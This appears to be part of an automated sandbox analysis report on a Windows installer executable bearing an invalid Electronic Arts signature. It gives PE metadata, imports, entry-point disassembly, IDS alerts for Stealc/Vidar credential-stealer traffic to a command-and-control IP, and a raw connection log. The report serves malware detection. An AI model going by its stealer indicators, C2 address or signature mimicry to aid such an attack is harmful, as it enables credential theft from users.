                                                                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                    Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                                                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                                                                                                    • 04/05/2023 02:00:00 07/05/2026 01:59:59
                                                                                                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                                                                                                    • CN="Electronic Arts, Inc.", OU=EAC, O="Electronic Arts, Inc.", L=Redwood City, S=CALIFORNIA, C=US
                                                                                                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                                                                                                    Thumbprint MD5:33BD4710688F5874BAC612E52BCCEEA8
                                                                                                                                                                                                                                                                                                    Thumbprint SHA-1:A46E87AEBD8693AE8B3B2F26449F8828368B4D4F
                                                                                                                                                                                                                                                                                                    Thumbprint SHA-256:0F952F3F6AF7C5B1FE753761AD34E2C360930EF530EB6A753AB461046F79C049
                                                                                                                                                                                                                                                                                                    Serial:0671352DC4C103B70AE725E954486374
                                                                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                                                                    sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                                                                                                                                    xor ebp, ebp
                                                                                                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                                                                                                    mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                    mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                                    mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                                    call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                                    push 00008001h
                                                                                                                                                                                                                                                                                                    call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                                    call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                                    push 00000008h
                                                                                                                                                                                                                                                                                                    mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                                    call 00007F6DBD54354Bh
                                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                                    push 000002B4h
                                                                                                                                                                                                                                                                                                    mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                                    lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                                    push 0040A264h
                                                                                                                                                                                                                                                                                                    call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                                    push 0040A24Ch
                                                                                                                                                                                                                                                                                                    push 00476AA0h
                                                                                                                                                                                                                                                                                                    call 00007F6DBD54322Dh
                                                                                                                                                                                                                                                                                                    call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                                    mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                                                                                    call 00007F6DBD54321Bh
                                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                                    call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                                    cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                                    mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                                    mov eax, edi
                                                                                                                                                                                                                                                                                                    jne 00007F6DBD540B1Ah
                                                                                                                                                                                                                                                                                                    push 00000022h
                                                                                                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                                                                                                    mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                                    call 00007F6DBD542EF1h
                                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                                    call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                                                                                                                                    mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                                    jmp 00007F6DBD540BA3h
                                                                                                                                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                                                                                                                                    pop ebx
                                                                                                                                                                                                                                                                                                    cmp ax, bx
                                                                                                                                                                                                                                                                                                    jne 00007F6DBD540B1Ah
                                                                                                                                                                                                                                                                                                    add esi, 02h
                                                                                                                                                                                                                                                                                                    cmp word ptr [esi], bx
                                                                                                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                    • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                    • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                    • [LNK] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x6dc6.rsrc
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x11b88d0x2860
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                    .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                    .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                    .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                    .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                    .rsrc0x1000000x6dc60x6e00503d2313837bbb760d18ee9d9cf351c4False0.9559303977272727data7.840110049555299IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                    .reloc0x1070000xfd60x10003ab95bfd48be73776233504b176bec0eFalse0.597900390625data5.584574810886472IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                    RT_ICON0x1001c00x6227PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000119393481116
                                                                                                                                                                                                                                                                                                    RT_ICON0x1063e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6773049645390071
                                                                                                                                                                                                                                                                                                    RT_DIALOG0x1068500x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                                                                    RT_DIALOG0x1069500x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                                                                    RT_DIALOG0x106a6c0x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                                                                    RT_GROUP_ICON0x106acc0x22dataEnglishUnited States0.9705882352941176
                                                                                                                                                                                                                                                                                                    RT_MANIFEST0x106af00x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                                                                    KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                                                                    USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                                                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                                                                    SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                                                                    ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                                                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                    2024-12-04T02:01:51.781811+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.649942159.69.102.165443TCP
                                                                                                                                                                                                                                                                                                    2024-12-04T02:01:51.782022+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1159.69.102.165443192.168.2.649942TCP
                                                                                                                                                                                                                                                                                                    2024-12-04T02:01:54.172667+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11159.69.102.165443192.168.2.649947TCP
                                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:41.173919916 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:41.345741034 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:41.564568996 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:50.783180952 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:50.955079079 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:51.173819065 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:53.578865051 CET44349699173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:53.578985929 CET49699443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:54.579874039 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:54.579920053 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:54.579996109 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:54.580507994 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:54.580521107 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:56.379698038 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:56.379777908 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:56.383495092 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:56.383507967 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:56.383761883 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:56.392293930 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:56.439330101 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:56.871294975 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:56.871330023 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:56.871345997 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:56.871397018 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:56.871421099 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:56.871490002 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.061188936 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.061208010 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.061312914 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.061336040 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.061378956 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.106070995 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.106091976 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.106213093 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.106221914 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.106273890 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.241839886 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.241861105 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.241940022 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.241956949 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.242006063 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.280819893 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.280836105 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.280925989 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.280936956 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.280988932 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.303024054 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.303040028 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.303102016 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.303108931 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.303153992 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.322148085 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.322164059 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.322236061 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.322246075 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.322290897 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.435389996 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.435410023 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.435456038 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.435465097 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.435501099 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.435523033 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.453802109 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.453819036 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.453870058 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.453877926 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.453927040 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.469755888 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.469773054 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.469822884 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.469830990 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.469877005 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.469898939 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.485629082 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.485645056 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.485702991 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.485709906 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.485758066 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.499356985 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.499373913 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.499433994 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.499442101 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.499490976 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.501488924 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.501540899 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.501586914 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.502142906 CET49700443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.502155066 CET4434970013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.581763983 CET49701443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.581818104 CET4434970113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.581899881 CET49701443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.583188057 CET49702443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.583236933 CET4434970213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.583321095 CET49702443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.584152937 CET49703443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.584161997 CET4434970313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.584228039 CET49703443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.585633993 CET49704443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.585654020 CET4434970413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.585736990 CET49704443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.585891962 CET49703443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.585907936 CET4434970313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.586016893 CET49701443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.586030006 CET4434970113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.586133003 CET49704443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.586147070 CET4434970413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.586246967 CET49702443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.586258888 CET4434970213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.587409973 CET49705443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.587441921 CET4434970513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.587515116 CET49705443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.587657928 CET49705443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:57.587666988 CET4434970513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.331212044 CET4434970313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.331717014 CET4434970413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.363607883 CET49703443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.363639116 CET4434970313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.364245892 CET49703443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.364250898 CET4434970313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.364619017 CET49704443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.364635944 CET4434970413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.365036964 CET49704443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.365045071 CET4434970413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.377548933 CET4434970113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.377842903 CET49701443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.377860069 CET4434970113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.378206968 CET49701443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.378211975 CET4434970113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.443188906 CET4434970513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.443802118 CET49705443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.443825006 CET4434970513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.444097042 CET4434970213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 01:59:59.444183111 CET49705443192.168.2.613.107.246.63
